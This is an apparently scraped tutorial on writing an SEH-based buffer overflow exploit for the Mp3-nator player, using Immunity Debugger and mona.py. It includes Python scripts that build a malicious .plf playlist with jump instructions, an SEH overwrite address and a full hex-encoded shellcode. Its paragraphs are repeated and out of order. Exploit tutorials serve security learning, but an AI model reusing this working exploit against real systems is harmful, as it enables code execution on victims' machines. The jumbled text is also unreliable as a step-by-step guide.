Exploit writing>>> SEH based!
Today i have re-exploited a software called mp3-nator. SEH based is bit challenging. I am going to show you quickly that how i exploited this SEH based vulnerable using only following tools:
1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For shellcode).
4. Vulnerable Application
Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!
The simple mona command is : pattern_create 6000 and replace "A" with the pattern saved in indicated location(For me it is on: C:\mona\MP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:
We see SEH and Next SEH got overwritten with mona's pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let's find:
Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:
If next SEH is "BBBB" and SEH is "CCCC" then we are ready to go :) .
Anyway, I have choose the address 0x00448f7a of MP3N.exe. Since we have Null byte at our return address so we simply can't put our shellcode normally as we did before.
1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For shellcode).
4. Vulnerable Application
Access Violation!
First going to make the application crashed(The classic way!). Before that attach the application to immunity debugger. Hope you already know how to attach an application on Immunity Debugger(File>>Attach>> Find Mp3-Nator>>Click on Attach):
The simple python script:
After generating the "nator.plf" we need to open the file:
1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.
But unfortunately it is not going to overwrite the EIP at all because of SEH.
EDX,EBP,ESI and EDI holding our own buffer(We can replace with shellcode!). But SEH also got overwritten by our buffer:print "Creating expoit."
f=open("nator.plf","w") #Create the file
push="A"*6000
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"
After generating the "nator.plf" we need to open the file:
1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.
But unfortunately it is not going to overwrite the EIP at all because of SEH.
Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!
What ? What is SEH? The SEH
Buffer space
I used mona.py to create the pattern(metasploit can do this too). If you don't know to install mona or how to use it then go to redmine.corelan.be/projects/mona And read the manual.
The simple mona command is : pattern_create 6000 and replace "A" with the pattern saved in indicated location(For me it is on: C:\mona\MP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:
We see SEH and Next SEH got overwritten with mona's pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let's find:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
push="A"*4108 #4112-4
push+="B"*4 #Next SEH
push+="C"*4 #SEH
push+="D"*2000 #Shellcode
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"
If next SEH is "BBBB" and SEH is "CCCC" then we are ready to go :) .
DO SOMETHING WITH SEH and NSEH
This time we want to overwrite SEH and Next SEH with an valid address so that it goes to our shellcode. The common address to find "pop pop ret" for SEH and few bytes jump address in Next SEH.
Run mona command !mona seh at crash time ,open the file and find the null-free address. But unfortunately our life is not that easy so there is no no null-free address. The Exploit is going to be bit challenging.
Anyway, I have choose the address 0x00448f7a of MP3N.exe. Since we have Null byte at our return address so we simply can't put our shellcode normally as we did before.
Do the Calculation
Calculation for storing shellcode
Now our exploit:
So it is time to put our real shellcode. Here is the final script:
Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!
And pop up the calc:
I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ and
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
Good luck and happy hunting!!!
LONG JUMP
NSEH
Our calculation is done!!!
BUILDING THE EXPLOIT
Now our exploit:
junk+shellcode+nops+jump+nseh+seh+more
The simple way to explain this,
Anyway, Let's get back to debugger and do some test:
Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.
After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:
in normal SEH based overflow we first find an address for "pop pop ret" and a short jump in NSEH , Such as "\xeb\x08\x90\x90" but this is forward jump whereas we need backward jump as we already calculated using metasm(jmp $-20) . Anyway, Since we have only null-bytes SEH(0x00448f7a) address so we can't simply short jump to our nops or shellcode. For this reason we will need a long jump to land in where our nops starts.
The simple way to explain this,
Junk 2608. Put nops instead "A" to be safe. Then put the 343 bytes shellcode. So stack holding 2608+343 , Then more 1152 nops(\x90) and the long jump "\xe9\x2b\xf8\xff\xff" . The long jump is some kind of instruction and it is 5 bytes. We now have exact bytes to overwrite the SEH and NSEH with our address:
2608+343+1152+5=4108 .After the 4108 junk we need NSEH to make a short jump to our long jump. If we make 20 bytes backward jump then we land in our nops within 1152. Remember, Nops does nothing but goes over. So stack simply again executing the long jump "\xe9\x2b\xf8\xff\xff". After executing the long jump it will again go back to our nops within 2608. After the the nops we have shellcode to execute. Since we made 2000 backward jump so it needs 1113 nops to pass to reach our shellcode.
Anyway, Let's get back to debugger and do some test:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
#343 bytes shellcode
shellcode ="D"*343
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff" #Jump back -2000 bytes
nseh ="\xeb\xea\x90\x90" #short jump
seh ="\x7a\x8f\x44\x00" #0x00448f7a
more="\x90"*1000
try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"
Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.
Now open the nator.plf on the application. Just press SHIFT+F9 at first crash. We hit our breakpoint. If we scroll down a bit lower then we see that we have a bunch of "D" within our 4108bytes
After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:
We just did a backward jump to 20 bytes nops. Well Let's keep going with F8. 0012FD53 ^E9 2BF8FFFF JMP 0012F583 Actually the long jump. And it again goes back to 2000bytes backward where our nops start. So if we keep going by pressing F8 then we will reach the "44" soon which mean "D", Later we will replace the D with our real shellcode.
So it is time to put our real shellcode. Here is the final script:
print "Creating expoit."
f=open("nator.plf","w") #Create the file
junk="\x90"*2608
#343 bytes shellcode
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff" #Jump back -2000 bytes
nseh ="\xeb\xea\x90\x90" #short jump
seh ="\x7a\x8f\x44\x00" #0x00448f7a
more="\x90"*1000
try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"
Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!
And pop up the calc:
BOOM!!!
The most important of this exploit is dealing with NULL-BYTES "pop pop ret". I hope you now have clear understanding of how to work with these kind of situation. But still if you have any problem , Contact me or comment here and i will try my best to help you!
I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ and
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
Good luck and happy hunting!!!
